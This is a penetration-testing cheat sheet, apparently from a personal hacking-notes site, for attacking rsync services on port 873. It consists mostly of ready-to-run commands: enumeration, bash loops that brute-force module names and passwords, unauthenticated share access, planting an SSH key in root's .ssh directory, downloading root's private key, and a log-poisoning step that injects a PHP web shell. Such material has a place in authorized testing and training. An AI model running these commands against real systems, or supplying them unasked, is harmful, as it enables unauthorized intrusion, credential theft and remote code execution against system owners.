873 - Rsync | d4t4s3c hacks & pills

Information

Default Port: 873

PORT    STATE SERVICE
873/tcp open  rsync

Enumeration

nc -vn 192.168.1.2 873
timeout 0.1 bash -c "nc -nv 192.168.1.2 873"
nmap -sVC -p873 192.168.1.2
nmap --script="rsync*" -p873 192.168.1.2

Modules

List

list = yes (null & auth)

rsync 192.168.1.2::                                       # default port
rsync 192.168.1.2:: --port=1234                           # other port         
rsync -6 '[fe80::a00:27ff:fe72:4cba%eth0]'::              # ipv6

nmap -p873 --script="rsync-list-modules" 192.168.1.2

Brute Force

list = no

Bash

Auth: NO

# equal (code 0)
while IFS= read -r line; do echo ${line} | timeout 0.5 rsync 192.168.1.2::${line} &>/dev/null; if [ $? -eq 0 ]; then echo -e "\n[+] Found: ${line}\n"; break; fi; done < /opt/common.txt

Auth: YES

# not equal (code 5)
while IFS= read -r line; do echo ${line} | timeout 0.5 rsync 192.168.1.2::${line} &>/dev/null; if [ $? -ne 5 ]; then echo -e "\n[+] Found: ${line}\n"; break; fi; done < /opt/common.txt

Metasploit

❯ msfconsole -q
msf6 > use auxiliary/scanner/rsync/modules_list
msf6 auxiliary(scanner/rsync/modules_list) > set RHOSTS 192.168.1.62
msf6 auxiliary(scanner/rsync/modules_list) > options
msf6 auxiliary(scanner/rsync/modules_list) > run
[+] 192.168.1.62:873      - 1 rsync modules found: share
[*] 192.168.1.62:873      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Access

Null

rsync 192.168.1.2::share
rsync -r 192.168.1.2::share    # recursive

Auth

rsync peter@192.168.1.2::share
rsync rsync://peter@192.168.1.2/share
sshpass -p 'Password1' rsync rsync://peter@192.168.1.2/share/

File Transfer

Upload

rsync id_rsa 192.168.1.2::files/root/.ssh/
rsync cmd.php rsync://peter@192.168.1.2/files/

Download

rsync 192.168.1.2::files/root/.ssh/id_rsa .

Brute Force

Password

while IFS= read -r line; do echo ${line} | timeout 0.5 sshpass -p ${line} rsync rsync://peter@192.168.1.2/share/ &>/dev/null; if [ $? -eq 0 ]; then echo -e "\n[+] Found: ${line}\n"; break; fi; done < /opt/techyou.txt

Files

/etc/rsyncd.conf         # config
/etc/rsyncd.secrets      # password
/var/log/rsyncd.log      # log

find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)

Log Poisoning

rsync '[2a02:2e02:97c0:a000:0a00:27ff:fe43:89cd]'::'<?php system($_GET["cmd"]); ?>'
rsync "[fe80::a00:27ff:fe43:89cd%eth0:]"::'<?php system($_GET["cmd"]); ?>'